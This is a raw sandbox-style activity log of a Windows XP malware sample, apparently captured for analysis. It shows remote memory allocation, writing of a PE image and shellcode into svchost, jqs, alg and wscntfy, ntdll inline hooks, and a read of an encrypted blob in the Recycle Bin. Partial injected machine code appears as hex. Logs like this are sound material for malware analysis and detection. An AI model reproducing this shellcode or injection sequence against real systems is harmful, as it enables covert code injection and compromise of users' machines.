Thread delayed Time: 0 TID: 4214 success or wait 2038033730
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2038034608
Thread delayed Time: 0 TID: 4214 success or wait 2038035008
Memory allocated PID: 448 Path: C:\WINDOWS\system32\svchost.exe Base: A60000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2038035250
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2038036469
System info queried Type: BasicInformation success or wait 2038037029
System info queried Type: ProcessorInformation success or wait 2038037795
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2038038501
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2038038680
System info queried Type: BasicInformation success or wait 2038040241
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2038041241
System info queried Type: ProcessorInformation success or wait 2038041596
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2038041743
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2038042600
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2038043862
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2038044359
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2038045004
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2038045880
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BB90A90 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2038046002
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2038046562
System info queried Type: BasicInformation success or wait 2038047150
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2038047966
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2038048432
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2038048732
System info queried Type: BasicInformation success or wait 2038049461
System info queried Type: ProcessorInformation success or wait 2038049927
System info queried Type: ProcessorInformation success or wait 2038050479
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2038051365
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2038052469
Memory written PID: 448 Path: C:\WINDOWS\system32\svchost.exe Base: A60000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2038072122
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2038072708
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2038073365
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2038073870
Memory attributes changed PID: 448 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2038074233
Memory written PID: 448 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 15 84 success or wait 2038117770
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2038118478
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2038120658
Memory allocated PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2038123722
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2038124754
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2038125567
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2038125757
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2038135134
Memory written PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2041016773
System info queried Type: BasicInformation success or wait 2041019904
Thread delayed Time: 0 TID: 4214 success or wait 2041020048
Thread delayed Time: 0 TID: 4214 success or wait 2041020499
Thread delayed Time: 0 TID: 4214 success or wait 2041022995
System info queried Type: ProcessorInformation success or wait 2041024029
Thread delayed Time: 0 TID: 4214 success or wait 2041024563
Memory written PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2041067745
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2041068346
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BB7F2F8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2041069157
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2041070228
Memory allocated PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 10A0000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2041070796
System info queried Type: BasicInformation success or wait 2041071206
System info queried Type: BasicInformation success or wait 2041071330
System info queried Type: ProcessorInformation success or wait 2041071725
System info queried Type: ProcessorInformation success or wait 2041072024
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2041072616
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2041073364
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2041076586
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2041077292
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2041079481
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2041079645
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2041080040
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2041080232
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2041082660
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2041083478
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2041085180
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2041085850
System info queried Type: BasicInformation success or wait 2041087060
System info queried Type: BasicInformation success or wait 2041087211
System info queried Type: ProcessorInformation success or wait 2041087685
System info queried Type: ProcessorInformation success or wait 2041088533
Memory written PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 10A0000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2041107593
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2041109226
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BB7CF58 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2041110047
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2041110573
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2041111172
Memory written PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 79 84 success or wait 2041123675
System info queried Type: BasicInformation success or wait 2041124372
System info queried Type: ProcessorInformation success or wait 2041125771
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2041127385
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2041129561
Memory allocated PID: 1988 Path: C:\WINDOWS\system32\alg.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2041130005
Memory attributes changed PID: 1988 Path: C:\WINDOWS\system32\alg.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2041130652
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2041131124
Memory attributes changed PID: 1988 Path: C:\WINDOWS\system32\alg.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2041131285
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2041131754
Memory attributes changed PID: 1988 Path: C:\WINDOWS\system32\alg.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2041132330
Memory written PID: 1988 Path: C:\WINDOWS\system32\alg.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2042278152
Thread delayed Time: 0 TID: 4214 success or wait 2042279538
Thread delayed Time: 0 TID: 4214 success or wait 2042279641
Thread delayed Time: 0 TID: 4214 success or wait 2042280976
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2042281151
Memory written PID: 1988 Path: C:\WINDOWS\system32\alg.exe Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2042298213
Thread delayed Time: 0 TID: 4214 success or wait 2042303460
Memory allocated PID: 1988 Path: C:\WINDOWS\system32\alg.exe Base: 990000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2042304362
System info queried Type: BasicInformation success or wait 2042304748
System info queried Type: ProcessorInformation success or wait 2042305148
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2042305234
System info queried Type: BasicInformation success or wait 2042305936
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2042306217
System info queried Type: ProcessorInformation success or wait 2042306602
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2042306895
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2042307381
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2042307856
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2042308084
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BB90168 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2042308130
Section loaded Path: \KnownDlls\nspr4.dll Access: write and read and execute Type: unknown Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid object name not found 2042308728
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2042310078
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2042310803
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2042310990
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2042314924
System info queried Type: BasicInformation success or wait 2042316430
System info queried Type: ProcessorInformation success or wait 2042316577
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2042317292
System info queried Type: BasicInformation success or wait 2042317524
System info queried Type: ProcessorInformation success or wait 2042318140
Memory written PID: 1988 Path: C:\WINDOWS\system32\alg.exe Base: 990000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2042342459
File opened Path: C:\WINDOWS\system32\USER32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2042342697
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\user32.dll success or wait 2042343286
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 4 Value: D8 00 00 00 success or wait 2042343635
Memory attributes changed PID: 1988 Path: C:\WINDOWS\system32\alg.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2042343806
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\user32.dll success or wait 2042343979
Memory written PID: 1988 Path: C:\WINDOWS\system32\alg.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 08 84 success or wait 2042365660
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 20 Value: 4C 01 04 00 1B A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2042366031
Memory allocated PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2042367183
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2042367568
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 F4 05 00 00 E2 02 00 00 00 00 00 17 B2 00 00 00 10 00 00 00 B0 05 00 00 00 41 7E 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 10 09 00 00 04 00 00 76 FC 08 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 39 00 00 success or wait 2042367653
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\user32.dll success or wait 2042368077
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 83 F2 05 00 00 10 00 00 00 F4 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 80 11 00 00 00 10 06 00 00 0C 00 00 00 F8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 88 A0 02 00 00 30 06 00 00 A2 02 00 success or wait 2042368408
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2042368699
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\user32.dll success or wait 2042369001
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2042369067
Section loaded Path: C:\WINDOWS\system32\user32.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 57344 Protection: readonly Mapped to pid: own pid success or wait 2042369296
